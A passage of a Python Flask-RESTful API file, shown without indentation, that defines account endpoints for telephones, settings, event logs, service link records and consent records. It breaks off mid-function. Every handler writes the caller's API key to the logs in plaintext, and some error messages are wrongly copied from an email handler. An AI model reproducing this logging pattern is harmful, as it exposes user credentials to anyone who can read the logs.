class AccountTelephones(Resource):
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountTelephones")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Telephones
try:
logger.info("Fetching Telephones")
db_entries = get_telephones(account_id=account_id)
except Exception as exp:
error_title = "No Telephones found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Telephones Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def post(self, account_id):
logger.info("AccountTelephones")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = TelephonesSchema()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors),
source=endpoint)
else:
logger.debug("JSON validation -> OK")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Add Telephone
try:
logger.info("Adding Telephone")
db_entries = add_telephone(account_id=account_id, attributes=attributes)
except Exception as exp:
error_title = "Could not add Telephone entry"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Telephone added")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=201)
class AccountTelephone(Resource):
@requires_api_auth_user
def get(self, account_id, telephones_id):
logger.info("AccountTelephone")
try:
endpoint = str(api.url_for(self, account_id=account_id, telephones_id=telephones_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
telephones_id = str(telephones_id)
except Exception as exp:
error_title = "Unsupported telephones_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("telephones_id: " + telephones_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Telephone
try:
logger.info("Fetching Telephone")
db_entries = get_telephone(account_id=account_id, id=telephones_id)
except Exception as exp:
error_title = "No Telephone found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Telephone Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def patch(self, account_id, telephones_id): # TODO: Should be PATCH instead of PUT
logger.info("AccountTelephone")
try:
endpoint = str(api.url_for(self, account_id=account_id, telephones_id=telephones_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
telephones_id = str(telephones_id)
except Exception as exp:
error_title = "Unsupported telephones_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("telephones_id: " + telephones_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = TelephonesSchemaForUpdate()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
telephones_id_from_payload = json_data['data'].get("id", "")
except Exception as exp:
error_title = "Could not get id from payload"
logger.error(error_title)
raise ApiError(
code=404,
title=error_title,
detail=repr(exp),
source=endpoint
)
# Check if emails_id from path and payload are matching
if telephones_id != telephones_id_from_payload:
error_title = "Email IDs from path and payload are not matching"
compared_ids = {'IdFromPath': telephones_id, 'IdFromPayload': telephones_id_from_payload}
logger.error(error_title + ", " + json.dumps(compared_ids))
raise ApiError(
code=403,
title=error_title,
detail=compared_ids,
source=endpoint
)
else:
logger.info("Telephone IDs from path and payload are matching")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Update Telephone
try:
logger.info("Updating Telephone")
db_entries = update_telephone(account_id=account_id, id=telephones_id, attributes=attributes)
except Exception as exp:
# TODO: Error handling on more detailed level
error_title = "No Telephone found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Telephone Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountSettings(Resource):
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountSettings")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Settings
try:
logger.info("Fetching Settings")
db_entries = get_settings(account_id=account_id)
except Exception as exp:
error_title = "No Settings found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Settings Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def post(self, account_id):
logger.info("AccountSettings")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = SettingsSchema()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors),
source=endpoint)
else:
logger.debug("JSON validation -> OK")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Add Setting
try:
logger.info("Adding Setting")
db_entries = add_setting(account_id=account_id, attributes=attributes)
except Exception as exp:
error_title = "Could not add Setting entry"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Setting added")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=201)
class AccountSetting(Resource):
@requires_api_auth_user
def get(self, account_id, settings_id):
logger.info("AccountSetting")
try:
endpoint = str(api.url_for(self, account_id=account_id, settings_id=settings_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
settings_id = str(settings_id)
except Exception as exp:
error_title = "Unsupported settings_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("settings_id: " + settings_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Setting
try:
logger.info("Fetching Setting")
db_entries = get_setting(account_id=account_id, id=settings_id)
except Exception as exp:
error_title = "No Setting found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Setting Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def patch(self, account_id, settings_id): # TODO: Should be PATCH instead of PUT
logger.info("AccountSetting")
try:
endpoint = str(api.url_for(self, account_id=account_id, settings_id=settings_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
settings_id = str(settings_id)
except Exception as exp:
error_title = "Unsupported settings_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("settings_id: " + settings_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = SettingsSchemaForUpdate()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
settings_id_from_payload = json_data['data'].get("id", "")
except Exception as exp:
error_title = "Could not get id from payload"
logger.error(error_title)
raise ApiError(
code=404,
title=error_title,
detail=repr(exp),
source=endpoint
)
# Check if emails_id from path and payload are matching
if settings_id != settings_id_from_payload:
error_title = "Email IDs from path and payload are not matching"
compared_ids = {'IdFromPath': settings_id, 'IdFromPayload': settings_id_from_payload}
logger.error(error_title + ", " + json.dumps(compared_ids))
raise ApiError(
code=403,
title=error_title,
detail=compared_ids,
source=endpoint
)
else:
logger.info("Setting IDs from path and payload are matching")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Update Setting
try:
logger.info("Updating Setting")
db_entries = update_setting(account_id=account_id, id=settings_id, attributes=attributes)
except Exception as exp:
# TODO: Error handling on more detailed level
error_title = "No Setting found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Setting Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountEventLogs(Resource):
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountEventLogs")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get EventLog
try:
logger.info("Fetching EventLog")
db_entries = get_event_logs(account_id=account_id)
except Exception as exp:
error_title = "No EventLog found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("EventLog Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountEventLog(Resource):
@requires_api_auth_user
def get(self, account_id, event_log_id):
logger.info("AccountEventLog")
try:
endpoint = str(api.url_for(self, account_id=account_id, event_log_id=event_log_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
event_log_id = str(event_log_id)
except Exception as exp:
error_title = "Unsupported event_log_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("event_log_id: " + event_log_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get EventLog
try:
logger.info("Fetching EventLog")
db_entries = get_event_log(account_id=account_id, id=event_log_id)
except Exception as exp:
error_title = "No EventLog found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("EventLog Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountServiceLinkRecords(Resource):
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountServiceLinkRecords")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ServiceLinkRecords
try:
logger.info("Fetching ServiceLinkRecords")
db_entries = get_slrs(account_id=account_id)
except Exception as exp:
error_title = "No ServiceLinkRecords found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ServiceLinkRecords Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountServiceLinkRecord(Resource):
@requires_api_auth_user
def get(self, account_id, slr_id):
logger.info("AccountServiceLinkRecord")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ServiceLinkRecord
try:
logger.info("Fetching ServiceLinkRecord")
db_entries = get_slr(account_id=account_id, slr_id=slr_id)
except Exception as exp:
error_title = "No ServiceLinkRecord found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ServiceLinkRecord Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountServiceLinkStatusRecords(Resource):
@requires_api_auth_user
def get(self, account_id, slr_id):
logger.info("AccountServiceLinkStatusRecords")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ServiceLinkStatusRecords
try:
logger.info("Fetching ServiceLinkStatusRecords")
db_entries = get_slsrs(account_id=account_id, slr_id=slr_id)
except StandardError as exp:
error_title = "ServiceLinkStatusRecords not accessible"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No ServiceLinkStatusRecords found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ServiceLinkStatusRecords Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountServiceLinkStatusRecord(Resource):
@requires_api_auth_user
def get(self, account_id, slr_id, slsr_id):
logger.info("AccountServiceLinkStatusRecord")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id, slsr_id=slsr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
try:
slsr_id = str(slsr_id)
except Exception as exp:
error_title = "Unsupported slsr_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slsr_id: " + slsr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ServiceLinkStatusRecord
try:
logger.info("Fetching ServiceLinkStatusRecord")
db_entries = get_slsr(account_id=account_id, slr_id=slr_id, slsr_id=slsr_id)
except StandardError as exp:
error_title = "ServiceLinkStatusRecords not accessible"
logger.error(error_title + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No tServiceLinkStatusRecord found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ServiceLinkStatusRecord Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountConsentRecords(Resource):
@requires_api_auth_user
def get(self, account_id, slr_id):
logger.info("AccountConsentRecords")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ConsentRecords
try:
logger.info("Fetching ConsentRecords")
db_entries = get_crs(account_id=account_id, slr_id=slr_id)
except StandardError as exp:
error_title = "ConsentRecords not accessible"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No ConsentRecords found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ConsentRecords Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountConsentRecord(Resource):
@requires_api_auth_user
def get(self, account_id, slr_id, cr_id):
logger.info("AccountConsentRecord")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id, cr_id=cr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
